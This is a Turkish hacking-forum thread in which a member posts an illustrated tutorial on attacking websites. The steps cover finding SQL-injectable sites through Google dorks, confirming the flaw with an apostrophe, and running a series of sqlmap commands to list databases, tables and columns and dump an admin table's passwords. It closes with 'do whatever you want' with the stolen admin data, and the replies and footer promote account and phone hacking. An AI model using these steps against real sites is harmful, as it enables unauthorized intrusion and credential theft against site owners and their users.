Güvenli Ticaret

Hacktivizm içerisinde gerçekleştirmeyi düşündüğünüz tüm ticaretlerde, dikkat ve önlem sahibi olun.

Daha Fazlası

Sorunum Var

Forum içerisinde yaşadığınız tüm sorunlar için sohbet alanını ya da sayfanın altında belirtilen Telegram kanalımızı kullanın.

Daha Fazlası

Doğru Türkçe ve Kurallar

Türkçemizi her bakımdan doğru kullanın ve forum kurallarına uygun paylaşımlar yapmaya özen gösterin.

Daha Fazlası

Kali Linux // SQLMAP İle Site Hacklemek! // Resimli!-@craixus

craixus

craixus

Kayıtlı Üye
Katılım
21 Temmuz 2021
Mesajlar
31
Tepkime puanı
7
Konum
𝐃𝐚𝐫𝐤 𝐖𝐞𝐛
İlgi Alanlarınız
sosyal ağ
Cinsiyet
  1. Erkek
kali_linux.png

Öncelikle şunu belirteyim, sadece kali linux'da yoktur, windowsda da vardır ama ben kali linux anlatımını yaptım, aynı işlemleri windowsda da aynı kodlarla gerçekleştirebilirsiniz. Şunu da belirteyim; Diceksiniz ki bu konudan birsürü var forumda, baktım bazılarının resimleri yok, ben canlandırmak amaçlı tekrar açtım.
ADIM 1 : Terminal'i açın.
PDRoab.png


ADIM 2: Açıklı bir site bulmak için tarayıcıya dork yazın. Örnek : "php?id=13" siz php nin yanına ingilizce kelime türeterek de yazabilirsiniz. Örnek : inurl: "war.php?id=" veya inurl: "article.php?id="
MDzy87.png


ADIM 3: Açıklı bir site bulduktan sonra sonuna ' işareti ekleyin ve sitede mysql hatası veriyorsa sql açığı vardır.
vP0LVO.png


ADIM 4: Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucak.


Kod:
sqlmap -u açıklı site --dbs


b6O2aY.png



Kod:
Gelen [y/N] sorularına y yazarak enterliyoruz.

ADIM 5: Kullanılabilir databaseleri gördük, bunlardan information_schema databasesi haricindeki diğer databaseleri kullanıcaz.
NDy4oP.png


ADIM 6: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.


Kod:
sqlmap -u açıklısite -D database adı --table


oVLZW2.png

ADIM 7: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.


Kod:
sqlmap -u açıklısite -D database adı --table


oVLZ4k.png


ADIM 8: Gördüğünüz gibi tablolar önümüze geldi ve 25 tane tablo buldu. Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.


Kod:
sqlmap -u açıklısite -D database adı -T admin --column


Z3rVlG.png


ADIM 9: Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi idsi adı vs.) Kodu aşağıdaki gibi yazın.
Z3rVla.png



Kod:
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump


0zPkdZ.png


ADIM 10: Gördüğünüz gibi admin bilgileri artık sizin elinizde, artık istediğinizi yapabilirsiniz. Admin panelini bulmayıda artık siz yapabilirsiniz.
5yAk5z.png



Evet bu konumuzdan da bukadardı. Umarım işinize yaramıştır. Anlatan: Burak Walker, resimler de bana aittir. Eğer bir sorununuz olursa altta belirtin ve "teşekkür" butonunu kullanmayı esirgemeyin. Konumu okuduğunuz için teşekkürler. İyi forumlar...
 
Can

Can

La Turquie Kémaliste
Admin
Katılım
19 Aralık 2020
Mesajlar
2,055
Tepkime puanı
7,159
Konum
Türkiye
İlgi Alanlarınız
ham radio
Cinsiyet
  1. Erkek
Eline sağlık kardeşim
 
A

Anonim6382

Kayıtlı Üye
Katılım
14 Ağustos 2024
Mesajlar
1
Tepkime puanı
0
Konum
Sivas
İlgi Alanlarınız
Yazılım, bilgisayar
Cinsiyet
  1. Erkek
  2. Kadın
craixus' Alıntı:
kali_linux.png

Öncelikle şunu belirteyim, sadece kali linux'da yoktur, windowsda da vardır ama ben kali linux anlatımını yaptım, aynı işlemleri windowsda da aynı kodlarla gerçekleştirebilirsiniz. Şunu da belirteyim; Diceksiniz ki bu konudan birsürü var forumda, baktım bazılarının resimleri yok, ben canlandırmak amaçlı tekrar açtım.
ADIM 1 : Terminal'i açın.
PDRoab.png


ADIM 2: Açıklı bir site bulmak için tarayıcıya dork yazın. Örnek : "php?id=13" siz php nin yanına ingilizce kelime türeterek de yazabilirsiniz. Örnek : inurl: "war.php?id=" veya inurl: "article.php?id="
MDzy87.png


ADIM 3: Açıklı bir site bulduktan sonra sonuna ' işareti ekleyin ve sitede mysql hatası veriyorsa sql açığı vardır.
vP0LVO.png


ADIM 4: Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucak.


Kod:
sqlmap -u açıklı site --dbs


b6O2aY.png



Kod:
Gelen [y/N] sorularına y yazarak enterliyoruz.

ADIM 5: Kullanılabilir databaseleri gördük, bunlardan information_schema databasesi haricindeki diğer databaseleri kullanıcaz.
NDy4oP.png


ADIM 6: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.


Kod:
sqlmap -u açıklısite -D database adı --table


oVLZW2.png

ADIM 7: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.


Kod:
sqlmap -u açıklısite -D database adı --table


oVLZ4k.png


ADIM 8: Gördüğünüz gibi tablolar önümüze geldi ve 25 tane tablo buldu. Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.


Kod:
sqlmap -u açıklısite -D database adı -T admin --column


Z3rVlG.png


ADIM 9: Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi idsi adı vs.) Kodu aşağıdaki gibi yazın.
Z3rVla.png



Kod:
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump


0zPkdZ.png


ADIM 10: Gördüğünüz gibi admin bilgileri artık sizin elinizde, artık istediğinizi yapabilirsiniz. Admin panelini bulmayıda artık siz yapabilirsiniz.
5yAk5z.png



Evet bu konumuzdan da bukadardı. Umarım işinize yaramıştır. Anlatan: Burak Walker, resimler de bana aittir. Eğer bir sorununuz olursa altta belirtin ve "teşekkür" butonunu kullanmayı esirgemeyin. Konumu okuduğunuz için teşekkürler. İyi forumlar...
Genişletmek için tıkla ...
Açıklı siteyi nasıl bulacaz onu anlamadım yazdım ama herhangi bir şey çıkmadı
 
Cevap yazmak için giriş yap yada kayıt ol.

Konuyu görüntüleyen kullanıcılar:

Toplam: 2 (Kullanıcı: 1, ziyaretçi: 1)
Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst